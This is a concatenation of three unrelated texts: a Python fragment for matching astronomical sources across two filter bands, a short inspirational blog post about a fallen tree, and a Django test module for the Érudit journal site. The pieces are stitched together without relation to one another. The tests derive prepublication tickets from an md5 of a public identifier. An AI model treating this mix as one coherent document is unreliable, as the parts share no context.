source in l2 within the given distance ``d``.
'''
ind1 = []
for i, s in enumerate(l1):
dsquared = (s[xname] - l2[xname])**2 + (s[yname] - l2[yname])**2
if (d is None) or (np.min(dsquared) < d**2):
ind1.append(i)
return ind1
def combine_source_tables(list621, list845, names, dmax=10, **kwargs):
'''Combine source tables. Input are two lists of tables in different bands.
This function:
- Only keeps sources if there is a source in the second band within ``dmax`` pixels.
- Adds a table column with the target name (from input ``names``)
- stackes everything in one big table.
'''
finallist = []
for i in range(len(list621)):
l1 = list621[i]
l2 = list845[i]
if len(l1) > 0:
l1['filter'] = 'F621M'
l1['TARGNAME'] = names[i]
if len(l2) > 0:
l2['filter'] = 'F845M'
l2['TARGNAME'] = names[i]
if (dmax is not None) and len(l1) > 0 and len(l2) > 0:
l1short = l1[check_matching_source_exists(l1, l2, dmax, **kwargs)]
l2short = l2[check_matching_source_exists(l2, l1, dmax, **kwargs)]
l1 = l1short
l2 = l2short
finallist.append(vstack([l1, l2]))
return vstack(finallist)
class DAOStarAutoThresholdFinder(DAOStarFinder):
'''An extended DAOStarFinder class.
'''
def __init__(self, threshold_scale=5, **kwargs):
self.threshold_in = threshold_scale
# Need to set threshold in super__init__ but value will be overwritten below anyway
super().__init__(threshold=1, **kwargs)
def __call__(self, data, *args, **kwargs):
self.threshold = self.threshold_in * np.std(data)
self.threshold_eff = self.threshold * self.kernel.relerr
return super().__call__(data, *args, **kwargs)
initial_finder = DAOStarAutoThresholdFinder(fwhm=2.5, threshold_scale=5.,
sharplo=0.55, sharphi=.75,
roundlo=-0.6, roundhi=0.6)
|
If a tree falls in your driveway and no one is around, does it make a sound?
Last Sunday I had the most interesting and enlightening thing happen. My wife and I were leaving the house and heading to church. As I approached the driveway, the unexpected sight of my 30 foot tree laid across my driveway and onto my car. The ordinarily steady symbol of strength had fallen.
It took a few seconds for this odd site to register in my brain. While I have heard of such things happening from time to time, I had never actually seen it up close. MY tree fell on MY car. But why? There was no particular storm the night before. There was no rain (I live in Southern California) There was no obvious reason why that tree should fall.
After closer examination, I think I found the reason. Upon further review…. The inside of the tree appeared to be infested with termites. The root system had been damaged.
The tree was strong looking on the outside, yet weak on the inside. This tree gave the perception of strength while lived in the reality of weakness. Thriving in the visible, suffering in the invisible. And great was it’s fall.
How many times have we seen public figures, while appearing strong on the outside, experience a great fall? And upon further review, the interior is always in a weakened state. The roots system is always vulnerable.
Let my fallen tree be a reminder or perhaps a wake-up call to us all! We often spend so much time working on outward appearances that we neglect our inward strength, depth and integrity. Sooner or later a storm always comes. And in the case of my tree, it was so weak on the inside; it didn’t even require much of a storm to cause its fall.
Let’s be strong for our families! Let’s focus on our interior rather than our exterior. Let’s sink deep roots in things that matter. Our daughters need a strong role model and a pillar of strength to look up too. No one is above a fall. Guard your interior. Strengthen your roots and remain strong. Let there be no great fall in your life!
Blessings to you and yours and thank you for the reminder and encouragement!
Thank you Paul – Hope you are well!
|
from bs4 import BeautifulSoup
from collections import OrderedDict
from lxml import etree as et
import datetime as dt
import io
import os
import pikepdf
import unittest.mock
import subprocess
import itertools
from hashlib import md5
from unittest.mock import PropertyMock
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import PermissionDenied
from django.urls import reverse
from django.http.response import HttpResponseRedirect
from django.test import Client
from django.test import TestCase, RequestFactory
from django.conf import settings
from django.test.utils import override_settings
import pytest
from apps.public.journal.viewmixins import SolrDataMixin
from core.subscription.test.utils import generate_casa_token
from erudit.models import JournalType, Issue, Article, Journal
from erudit.test.factories import ArticleFactory
from erudit.test.factories import CollectionFactory
from erudit.test.factories import DisciplineFactory
from erudit.test.factories import IssueFactory
from erudit.test.factories import EmbargoedIssueFactory
from erudit.test.factories import OpenAccessIssueFactory
from erudit.test.factories import JournalFactory
from erudit.test.factories import JournalInformationFactory
from erudit.test.solr import FakeSolrData
from erudit.fedora.objects import JournalDigitalObject
from erudit.fedora.objects import ArticleDigitalObject
from erudit.fedora.objects import MediaDigitalObject
from erudit.fedora import repository
from erudit.solr.models import Article as SolrArticle
from base.test.factories import UserFactory
from core.subscription.test.factories import JournalAccessSubscriptionFactory
from core.subscription.models import UserSubscriptions
from core.subscription.test.factories import JournalManagementSubscriptionFactory
from core.metrics.conf import settings as metrics_settings
from apps.public.journal.views import ArticleMediaView
from apps.public.journal.views import ArticleRawPdfView
from apps.public.journal.views import ArticleRawPdfFirstPageView
FIXTURE_ROOT = os.path.join(os.path.dirname(__file__), 'fixtures')
pytestmark = pytest.mark.django_db
def journal_detail_url(journal):
return reverse('public:journal:journal_detail', kwargs={'code': journal.code})
def issue_detail_url(issue):
return reverse('public:journal:issue_detail', args=[
issue.journal.code, issue.volume_slug, issue.localidentifier])
def article_detail_url(article):
return reverse('public:journal:article_detail', kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
def article_raw_pdf_url(article):
issue = article.issue
journal_id = issue.journal.localidentifier
issue_id = issue.localidentifier
article_id = article.localidentifier
return reverse('public:journal:article_raw_pdf', args=(
journal_id, issue.volume_slug, issue_id, article_id
))
class TestJournalListView:
@pytest.fixture(autouse=True)
def setup(self):
self.client = Client()
self.user = UserFactory.create(username='foobar')
self.user.set_password('notsecret')
self.user.save()
def test_upcoming_journals_are_hidden_from_list(self):
# Create 6 journals
journals = JournalFactory.create_batch(6)
# Create an issue for the first 5 journals
for journal in journals[:5]:
IssueFactory(journal=journal)
url = reverse('public:journal:journal_list')
# Run
response = self.client.get(url)
displayed_journals = set(response.context['journals'])
assert displayed_journals == set(journals[:5])
assert journals[5] not in displayed_journals
def test_can_sort_journals_by_name(self):
# Setup
collection = CollectionFactory.create()
journal_1 = JournalFactory.create_with_issue(collection=collection, name='ABC journal')
journal_2 = JournalFactory.create_with_issue(collection=collection, name='ACD journal')
journal_3 = JournalFactory.create_with_issue(collection=collection, name='DEF journal')
journal_4 = JournalFactory.create_with_issue(collection=collection, name='GHI journal')
journal_5 = JournalFactory.create_with_issue(collection=collection, name='GIJ journal')
journal_6 = JournalFactory.create_with_issue(collection=collection, name='GJK journal')
url = reverse('public:journal:journal_list')
# Run
response = self.client.get(url)
# Check
assert response.status_code == 200
assert len(response.context['sorted_objects']) == 3
assert response.context['sorted_objects'][0]['key'] == 'A'
assert response.context['sorted_objects'][0]['objects'] == [
journal_1, journal_2, ]
assert response.context['sorted_objects'][1]['key'] == 'D'
assert response.context['sorted_objects'][1]['objects'] == [journal_3, ]
assert response.context['sorted_objects'][2]['key'] == 'G'
assert response.context['sorted_objects'][2]['objects'] == [
journal_4, journal_5, journal_6, ]
def test_can_sort_journals_by_disciplines(self):
# Setup
collection = CollectionFactory.create()
discipline_1 = DisciplineFactory.create(code='abc-discipline', name='ABC')
discipline_2 = DisciplineFactory.create(code='def-discipline', name='DEF')
discipline_3 = DisciplineFactory.create(code='ghi-discipline', name='GHI')
journal_1 = JournalFactory.create_with_issue(collection=collection)
journal_1.disciplines.add(discipline_1)
journal_2 = JournalFactory.create_with_issue(collection=collection)
journal_2.disciplines.add(discipline_1)
journal_3 = JournalFactory.create_with_issue(collection=collection)
journal_3.disciplines.add(discipline_2)
journal_4 = JournalFactory.create_with_issue(collection=collection)
journal_4.disciplines.add(discipline_3)
journal_5 = JournalFactory.create_with_issue(collection=collection)
journal_5.disciplines.add(discipline_3)
journal_6 = JournalFactory.create_with_issue(collection=collection)
journal_6.disciplines.add(discipline_3)
url = reverse('public:journal:journal_list')
# Run
response = self.client.get(url, {'sorting': 'disciplines'})
# Check
assert response.status_code == 200
assert len(response.context['sorted_objects']) == 3
assert response.context['sorted_objects'][0]['key'] == discipline_1.code
assert response.context['sorted_objects'][0]['collections'][0]['key'] == collection
assert response.context['sorted_objects'][0]['collections'][0]['objects'] == [
journal_1, journal_2, ]
assert response.context['sorted_objects'][1]['key'] == discipline_2.code
assert response.context['sorted_objects'][1]['collections'][0]['key'] == collection
assert response.context['sorted_objects'][1]['collections'][0]['objects'] == [journal_3, ]
assert response.context['sorted_objects'][2]['key'] == discipline_3.code
assert response.context['sorted_objects'][2]['collections'][0]['key'] == collection
assert set(response.context['sorted_objects'][2]['collections'][0]['objects']) == set([
journal_4, journal_5, journal_6, ])
def test_only_main_collections_are_shown_by_default(self):
collection = CollectionFactory.create()
main_collection = CollectionFactory.create(is_main_collection=True)
JournalFactory.create_with_issue(collection=collection)
journal2 = JournalFactory.create_with_issue(collection=main_collection)
url = reverse('public:journal:journal_list')
response = self.client.get(url)
assert list(response.context['journals']) == [journal2]
def test_can_filter_the_journals_by_open_access(self):
# Setup
collection = CollectionFactory.create()
journal_1 = JournalFactory.create_with_issue(collection=collection, open_access=True)
JournalFactory.create(collection=collection, open_access=False)
url = reverse('public:journal:journal_list')
# Run
response = self.client.get(url, data={'open_access': True})
# Check
assert list(response.context['journals']) == [journal_1, ]
def test_can_filter_the_journals_by_types(self):
# Setup
collection = CollectionFactory.create()
jtype_1 = JournalType.objects.create(code='T1', name='T1')
jtype_2 = JournalType.objects.create(code='T2', name='T2')
JournalFactory.create(collection=collection, type=jtype_1)
journal_2 = JournalFactory.create_with_issue(collection=collection, type=jtype_2)
url = reverse('public:journal:journal_list')
# Run
response = self.client.get(url, data={'types': ['T2', ]})
# Check
assert list(response.context['journals']) == [journal_2, ]
def test_can_filter_the_journals_by_collections(self):
# Setup
col_1 = CollectionFactory(code='col1')
col_2 = CollectionFactory(code='col2')
JournalFactory.create_with_issue(collection=col_1)
journal_2 = JournalFactory.create_with_issue(collection=col_2)
url = reverse('public:journal:journal_list')
# Run
response = self.client.get(url, data={'collections': ['col2', ]})
# Check
assert list(response.context['journals']) == [journal_2, ]
def test_can_filter_the_journals_by_disciplines(self):
j1 = JournalFactory.create_with_issue(disciplines=['d1', 'd2'])
j2 = JournalFactory.create_with_issue(disciplines=['d2'])
j3 = JournalFactory.create_with_issue(disciplines=['d3'])
JournalFactory.create_with_issue(disciplines=['d4'])
url = reverse('public:journal:journal_list')
response = self.client.get(url, data={'disciplines': ['d2', 'd3']})
assert set(response.context['journals']) == {j1, j2, j3}
def test_new_journal_titles_are_not_uppercased(self):
journal = JournalFactory(is_new=True, name='Enjeux et société')
url = reverse('public:journal:journal_list')
html = self.client.get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
journals_list = dom.find('div', {'class': 'journals-list'})
assert 'Enjeux et société' in journals_list.decode()
assert 'Enjeux Et Société' not in journals_list.decode()
def test_journal_year_of_addition_is_displayed(self):
journal = JournalFactory(is_new=True, year_of_addition='2020')
url = reverse('public:journal:journal_list')
html = self.client.get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
journals_list = dom.find('div', {'class': 'journals-list'})
assert '(nouveauté 2020)' in journals_list.decode()
@pytest.mark.parametrize('logo, expected_logo_display', [
('logo.png', True),
(False, False),
])
def test_do_not_display_non_existent_journal_logo_on_list_per_disciplines(
self, logo, expected_logo_display,
):
journal = JournalFactory.create_with_issue(code='journal', name='Journal')
journal.disciplines.add(DisciplineFactory())
if logo:
repository.api.register_datastream(
journal.get_full_identifier(),
'/LOGO/content',
open(settings.MEDIA_ROOT + '/' + logo, 'rb').read(),
)
url = reverse('public:journal:journal_list')
html = self.client.get(url, {'sorting': 'disciplines'}).content.decode()
logo = '<img\n ' \
'src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQV' \
'R42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII="\n ' \
'data-src="/logo/journal/20110811144159.jpg"\n ' \
'alt="Logo pour Inter"\n ' \
'class="lazyload img-responsive card__figure"\n ' \
'/>'
if expected_logo_display:
assert logo in html
else:
assert logo not in html
class TestJournalDetailView:
@pytest.fixture(autouse=True)
def setup(self, settings):
settings.DEBUG = True
self.client = Client()
self.user = UserFactory.create(username='foobar')
self.user.set_password('notsecret')
self.user.save()
def test_main_title_is_always_in_context(self):
journal = JournalFactory()
response = self.client.get(journal_detail_url(journal))
assert 'main_title' in response.context.keys()
def test_can_embed_the_journal_information_in_the_context_if_available(self):
# Setup
journal_info = JournalInformationFactory(journal=JournalFactory())
url_1 = journal_detail_url(journal_info.journal)
journal_2 = JournalFactory()
url_2 = journal_detail_url(journal_2)
# Run
response_1 = self.client.get(url_1)
response_2 = self.client.get(url_2)
# Check
assert response_1.status_code == response_2.status_code == 200
assert response_1.context['journal_info'] == journal_info
assert response_2.context['journal_info'] == {'updated': None}
def test_can_display_when_issues_have_a_space_in_their_number(self, monkeypatch):
monkeypatch.setattr(Issue, 'erudit_object', unittest.mock.MagicMock())
issue = IssueFactory(number='2 bis')
url_1 = journal_detail_url(issue.journal)
# Run
response_1 = self.client.get(url_1)
assert response_1.status_code == 200
def test_can_embed_the_published_issues_in_the_context(self):
# Setup
journal = JournalFactory(collection=CollectionFactory(localidentifier='erudit'))
issue = IssueFactory(journal=journal)
IssueFactory(journal=journal, is_published=False)
url = journal_detail_url(journal)
# Run
response = self.client.get(url)
# Check
assert response.status_code == 200
assert list(response.context['issues']) == [issue]
def test_can_embed_the_current_issue_in_the_context(self):
issue1 = IssueFactory.create()
issue2 = IssueFactory.create_published_after(issue1)
url = journal_detail_url(issue1.journal)
response = self.client.get(url)
assert response.status_code == 200
assert response.context['current_issue'] == issue2
def test_can_embed_the_current_issue_external_url_in_the_context(self):
# If the latest issue has an external URL, it's link properly reflects that (proper href,
# blank target.
external_url = 'https://example.com'
issue1 = IssueFactory.create()
issue2 = IssueFactory.create_published_after(issue1, external_url=external_url)
url = journal_detail_url(issue1.journal)
response = self.client.get(url)
assert response.status_code == 200
assert response.context['current_issue'] == issue2
link_attrs = response.context['current_issue'].extra.detail_link_attrs()
assert external_url in link_attrs
assert '_blank' in link_attrs
def test_external_issues_are_never_locked(self):
# when an issue has an external url, we never show a little lock icon next to it.
external_url = 'https://example.com'
collection = CollectionFactory.create(code='erudit')
journal = JournalFactory(open_access=False, collection=collection) # embargoed
issue1 = IssueFactory.create(journal=journal, external_url=external_url)
url = journal_detail_url(issue1.journal)
response = self.client.get(url)
assert not response.context['current_issue'].extra.is_locked()
def test_embeds_subscription_info_to_context(self):
subscription = JournalAccessSubscriptionFactory(
type='individual',
user=self.user,
valid=True,
)
self.client.login(username='foobar', password='notsecret')
url = journal_detail_url(subscription.journal_management_subscription.journal)
response = self.client.get(url)
assert response.status_code == 200
assert response.context['content_access_granted']
assert response.context['subscription_type'] == 'individual'
def test_journal_detail_has_elements_for_anchors(self):
issue = IssueFactory()
url = journal_detail_url(issue.journal)
response = self.client.get(url)
content = response.content
assert b'<li role="presentation"' in content
assert b'<section role="tabpanel"' in content
assert b'<li role="presentation" id="journal-info-about-li"' not in content
assert b'<section role="tabpanel" class="tab-pane journal-info-block" id="journal-info-about"' not in content
@pytest.mark.parametrize('charges_apc', (True, False))
def test_journal_detail_has_no_apc_mention_if_it_charges_apc(self, charges_apc):
journal = JournalFactory(charges_apc=charges_apc)
url = journal_detail_url(journal)
response = self.client.get(url)
content = response.content
if not charges_apc:
assert b'Frais de publication' in content
else:
assert b'Frais de publication' not in content
@pytest.mark.parametrize('localidentifier', ('journal', 'previous_journal'))
def test_journal_notes_with_previous_journal(self, localidentifier):
journal = JournalFactory(
localidentifier=localidentifier,
notes=[
{
'pid': 'erudit:erudit.journal',
'langue': 'fr',
'content': 'Note pour journal',
},
{
'pid': 'erudit:erudit.previous_journal',
'langue': 'fr',
'content': 'Note pour previous_journal',
},
],
)
IssueFactory(journal=journal)
html = self.client.get(journal_detail_url(journal)).content.decode()
if localidentifier == 'journal':
assert 'Note pour journal' in html
assert 'Note pour previous_journal' not in html
elif localidentifier == 'previous_journal':
assert 'Note pour journal' not in html
assert 'Note pour previous_journal' in html
class TestJournalAuthorsListView:
def test_provides_only_authors_for_the_first_available_letter_by_default(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, authors=['btest', 'ctest1', 'ctest2'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url)
assert response.status_code == 200
assert set(response.context['authors_dicts'].keys()) == {'btest', }
def test_only_provides_authors_for_the_given_letter(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, authors=['btest', 'ctest1'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url, letter='b')
assert response.status_code == 200
authors_dicts = response.context['authors_dicts']
assert len(authors_dicts) == 1
assert authors_dicts.keys() == {'btest', }
def test_can_provide_contributors_of_article(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, authors=['btest', 'ctest1'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url, letter='b')
assert response.status_code == 200
authors_dicts = response.context['authors_dicts']
contributors = authors_dicts['btest'][0]['contributors']
assert contributors == ['ctest1']
def test_dont_show_unpublished_articles(self):
issue1 = IssueFactory.create(is_published=False)
issue2 = IssueFactory.create(journal=issue1.journal, is_published=True)
ArticleFactory.create(issue=issue1, authors=['foo'])
ArticleFactory.create(issue=issue2, authors=['foo'])
# Unpublished articles aren't in solr
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue1.journal.code})
response = Client().get(url, letter='f')
authors_dicts = response.context['authors_dicts']
# only one of the two articles are there
assert len(authors_dicts['foo']) == 1
def test_can_filter_by_article_type(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, type='article', authors=['btest'])
ArticleFactory.create(issue=issue_1, type='compterendu', authors=['btest'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url, article_type='article')
assert response.status_code == 200
authors_dicts = response.context['authors_dicts']
assert len(authors_dicts) == 1
def test_can_filter_by_article_type_when_no_article_of_type(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, type='article', authors=['atest'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url, {"article_type": 'compterendu'})
assert response.status_code == 200
def test_only_letters_with_results_are_active(self):
""" Test that for a given selection in the authors list view, only the letters for which
results are present are shown """
issue_1 = IssueFactory.create(journal=JournalFactory(), date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, type='article', authors=['atest'])
ArticleFactory.create(issue=issue_1, type='compterendu', authors=['btest'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url, {"article_type": 'compterendu'})
assert response.status_code == 200
assert not response.context['letters_exists'].get('A')
def test_do_not_fail_when_user_requests_a_letter_with_no_articles(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, type='article', authors=['btest'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url, {"article_type": 'compterendu', 'letter': 'A'})
assert response.status_code == 200
def test_inserts_the_current_letter_in_the_context(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, authors=['btest', 'ctest1', 'ctest2'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response_1 = Client().get(url)
response_2 = Client().get(url, {'letter': 'C'})
response_3 = Client().get(url, {'letter': 'invalid'})
assert response_1.status_code == 200
assert response_1.status_code == 200
assert response_1.status_code == 200
assert response_1.context['letter'] == 'B'
assert response_2.context['letter'] == 'C'
assert response_3.context['letter'] == 'B'
def test_inserts_a_dict_with_the_letters_counts_in_the_context(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, authors=['btest', 'ctest1', 'ctest2'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url)
assert response.status_code == 200
assert len(response.context['letters_exists']) == 26
assert response.context['letters_exists']['B']
assert response.context['letters_exists']['C']
for letter in 'adefghijklmnopqrstuvwxyz':
assert not response.context['letters_exists'][letter.upper()]
@pytest.mark.parametrize('article_type,expected', [('compterendu', True), ('article', False)])
def test_view_has_multiple_article_types(self, article_type, expected):
article1 = ArticleFactory.create(type='article', authors=['btest'])
ArticleFactory.create(issue=article1.issue, type=article_type, authors=['btest'])
url = reverse(
'public:journal:journal_authors_list',
kwargs={'code': article1.issue.journal.code})
response = Client().get(url)
assert response.context['view'].has_multiple_article_types == expected
def test_no_duplicate_authors_with_lowercase_and_uppercase_names(self):
issue = IssueFactory(journal__code='journal')
ArticleFactory.create(issue=issue, localidentifier='article1', authors=['FOO, BAR'])
ArticleFactory.create(issue=issue, localidentifier='article2', authors=['FOO, Bar'])
ArticleFactory.create(issue=issue, localidentifier='article3', authors=['Foo, Bar'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': 'journal'})
response = Client().get(url)
assert response.context['authors_dicts'] == OrderedDict({
'foo-bar': [
{
'author': 'FOO, BAR',
'contributors': [],
'id': 'article1',
'title': 'Robert Southey, Writing and Romanticism',
'url': None,
'year': '2',
}, {
'author': 'FOO, Bar',
'contributors': [],
'id': 'article2',
'title': 'Robert Southey, Writing and Romanticism',
'url': None,
'year': '2',
}, {
'author': 'Foo, Bar',
'contributors': [],
'id': 'article3',
'title': 'Robert Southey, Writing and Romanticism',
'url': None,
'year': '2',
},
],
})
class TestIssueDetailView:
def test_works_with_pks(self):
issue = IssueFactory.create(date_published=dt.datetime.now())
url = issue_detail_url(issue)
response = Client().get(url)
assert response.status_code == 200
@pytest.mark.parametrize("is_published,has_ticket,expected_code", [
(True, False, 200),
(True, True, 200),
(False, False, 302),
(False, True, 200),
])
def test_can_accept_prepublication_ticket(self, is_published, has_ticket, expected_code):
localidentifier = "espace03368"
issue = IssueFactory(localidentifier=localidentifier, is_published=is_published)
url = issue_detail_url(issue)
data = None
if has_ticket:
ticket = md5(localidentifier.encode()).hexdigest()
data = {'ticket': ticket}
response = Client().get(url, data=data)
assert response.status_code == expected_code
def test_works_with_localidentifiers(self):
issue = IssueFactory.create(
date_published=dt.datetime.now(), localidentifier='test')
url = issue_detail_url(issue)
response = Client().get(url)
assert response.status_code == 200
def test_fedora_issue_with_external_url_redirects(self):
# When we have an issue with a fedora localidentifier *and* external_url set, we redirect
# to that external url when we hit the detail view.
# ref #1651
issue = IssueFactory.create(
date_published=dt.datetime.now(), localidentifier='test',
external_url='http://example.com')
url = issue_detail_url(issue)
response = Client().get(url)
assert response.status_code == 302
assert response.url == 'http://example.com'
def test_can_render_issue_summary_when_db_contains_articles_not_in_summary(self):
# Articles in the issue view are ordered according to the list specified in the erudit
# object. If an article isn't referenced in the erudit object list, then it will not be
# shown. We rely on the fact that the default patched issue points to liberte1035607
# ref support#216
issue = IssueFactory.create()
a1 = ArticleFactory.create(issue=issue, localidentifier='31492ac')
a2 = ArticleFactory.create(issue=issue, localidentifier='31491ac')
ArticleFactory.create(issue=issue, localidentifier='not-there', add_to_fedora_issue=False)
url = issue_detail_url(issue)
response = Client().get(url)
articles = response.context['articles']
assert articles == [a1, a2]
@pytest.mark.parametrize("factory, expected_lock", [
(EmbargoedIssueFactory, True),
(OpenAccessIssueFactory, False),
])
def test_embargo_lock_icon(self, factory, expected_lock):
issue = factory(is_published=False)
url = issue_detail_url(issue)
response = Client().get(url, {'ticket': issue.prepublication_ticket})
# The embargo lock icon should never be displayed when a prepublication ticket is provided.
assert b'ion-ios-lock' not in response.content
issue.is_published = True
issue.save()
response = Client().get(url)
# The embargo lock icon should only be displayed on embargoed issues.
assert (b'ion-ios-lock' in response.content) == expected_lock
def test_article_items_are_not_cached_for_unpublished_issues(self):
issue = IssueFactory(is_published=False)
article = ArticleFactory(issue=issue, title="thisismyoldtitle")
url = issue_detail_url(issue)
resp = Client().get(url, {'ticket': issue.prepublication_ticket})
assert "thisismyoldtitle" in resp.content.decode('utf-8')
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_title('thisismynewtitle')
resp = Client().get(url, {'ticket': issue.prepublication_ticket})
assert "thisismynewtitle" in resp.content.decode('utf-8')
@override_settings(CACHES=settings.LOCMEM_CACHES)
def test_article_items_are_cached_for_published_issues(self):
issue = IssueFactory(is_published=True)
article = ArticleFactory(issue=issue, title="thisismyoldtitle")
url = issue_detail_url(issue)
resp = Client().get(url)
assert "thisismyoldtitle" in resp.content.decode('utf-8')
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_title('thisismynewtitle')
resp = Client().get(url, {'ticket': issue.prepublication_ticket})
assert "thisismyoldtitle" in resp.content.decode('utf-8')
def test_can_return_404_when_issue_doesnt_exist(self):
issue = IssueFactory(
localidentifier='test',
)
issue.localidentifier = 'fail'
url = issue_detail_url(issue)
response = Client().get(url)
assert response.status_code == 404
@pytest.mark.parametrize('publication_allowed', (True, False))
def test_publication_allowed_article(self, publication_allowed):
issue = IssueFactory(journal__open_access=True)
article = ArticleFactory(issue=issue, publication_allowed=publication_allowed)
url = reverse('public:journal:issue_detail', kwargs={
'journal_code': issue.journal.code,
'issue_slug': issue.volume_slug,
'localidentifier': issue.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
toolbox = dom.find('ul', {'class': 'toolbox'})
summary_link = dom.find('p', {'class': 'bib-record__record-link'})
if publication_allowed:
assert toolbox
assert summary_link
else:
assert not toolbox
assert not summary_link
@override_settings(CACHES=settings.LOCMEM_CACHES)
@pytest.mark.parametrize('language_code, expected_link', (
('fr', '<a class="tool-btn" href="/fr/revues/journal/2000-issue/article.pdf" '
'target="_blank" title="Télécharger">'),
('en', '<a class="tool-btn" href="/en/journals/journal/2000-issue/article.pdf" '
'target="_blank" title="Download">'),
))
def test_article_pdf_url_is_cache_with_the_right_language(
self, language_code, expected_link,
):
article = ArticleFactory(
issue__journal__code='journal',
issue__year='2000',
issue__localidentifier='issue',
localidentifier='article',
with_pdf=True,
)
with override_settings(LANGUAGE_CODE=language_code):
url = reverse('public:journal:issue_detail', kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'localidentifier': article.issue.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
toolbox = dom.find('ul', {'class': 'toolbox'})
assert expected_link in toolbox.decode()
def test_journal_titles_and_subtitles_are_displayed_in_all_languages(self):
issue = IssueFactory(journal__code='journal')
repository.api.set_publication_xml(
issue.get_full_identifier(),
open('tests/fixtures/issue/im03868.xml', 'rb').read(),
)
url = reverse('public:journal:issue_detail', kwargs={
'journal_code': issue.journal.code,
'issue_slug': issue.volume_slug,
'localidentifier': issue.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
title1 = dom.find('p', {'class': 'main-header__meta'}).decode()
assert title1 == '<p class="main-header__meta">\n' \
'<a href="/fr/revues/journal/" title="Consulter la revue">\n ' \
'Intermédialités\n \n \n ' \
'<span class="hint--bottom-left hint--no-animate" ' \
'data-hint="Tous les articles de cette revue sont soumis à un processus ' \
'd’évaluation par les pairs.">\n' \
'<i class="icon ion-ios-checkmark-circle"></i>\n' \
'</span>\n<br/>\n' \
'<span class="journal-subtitle">Histoire et théorie des arts, ' \
'des lettres et des techniques</span>\n<br/>\n ' \
'Intermediality\n \n \n <br/>\n' \
'<span class="journal-subtitle">History and Theory of the Arts, ' \
'Literature and Technologies</span>\n</a>\n</p>'
title2 = dom.find('div', {'class': 'latest-issue'}).find('h2').decode()
assert title2 == '<h2>\n<a href="/fr/revues/journal/" title="Consulter la revue">\n ' \
'Intermédialités\n \n <br/>\n' \
'<span class="journal-subtitle">Histoire et théorie des arts, ' \
'des lettres et des techniques</span>\n<br/>\n ' \
'Intermediality\n \n \n <br/>\n' \
'<span class="journal-subtitle">History and Theory of the Arts, ' \
'Literature and Technologies</span>\n</a>\n</h2>'
class TestArticleDetailView:
@pytest.fixture(autouse=True)
def article_detail_solr_data(self, monkeypatch):
monkeypatch.setattr(SolrDataMixin, 'solr_data', FakeSolrData())
@pytest.mark.parametrize('method', [
'get', 'options'
])
def test_can_render_erudit_articles(self, monkeypatch, eruditarticle, method):
# The goal of this test is to verify that out erudit article mechanism doesn't crash for
# all kinds of articles. We have many articles in our fixtures and the `eruditarticle`
# argument here is a parametrization argument which causes this test to run for each
# fixture we have.
monkeypatch.setattr(metrics_settings, 'ACTIVATED', False)
monkeypatch.setattr(Article, 'get_erudit_object', lambda *a, **kw: eruditarticle)
journal = JournalFactory.create(open_access=True)
issue = IssueFactory.create(
journal=journal, date_published=dt.datetime.now(), localidentifier='test_issue')
article = ArticleFactory.create(issue=issue, localidentifier='test_article')
url = article_detail_url(article)
response = getattr(Client(), method)(url)
assert response.status_code == 200
@pytest.mark.parametrize("is_published,has_ticket,expected_code", [
(True, False, 200),
(True, True, 200),
(False, False, 302),
(False, True, 200),
])
def test_can_accept_prepublication_ticket(self, is_published, has_ticket, expected_code):
localidentifier = "espace03368"
issue = IssueFactory(localidentifier=localidentifier, is_published=is_published)
article = ArticleFactory(issue=issue)
url = article_detail_url(article)
data = None
if has_ticket:
ticket = md5(localidentifier.encode()).hexdigest()
data = {'ticket': ticket}
response = Client().get(url, data=data)
assert response.status_code == expected_code
@pytest.mark.parametrize("is_published,ticket_expected", [
(True, False),
(False, True),
])
def test_prepublication_ticket_is_propagated_to_other_pages(self, is_published, ticket_expected):
localidentifier = "espace03368"
issue = IssueFactory(localidentifier=localidentifier, is_published=is_published)
articles = ArticleFactory.create_batch(issue=issue, size=3)
article = articles[1]
url = article_detail_url(article)
ticket = md5(localidentifier.encode()).hexdigest()
response = Client().get(url, data={'ticket': ticket})
from io import StringIO
tree = et.parse(StringIO(response.content.decode()), et.HTMLParser())
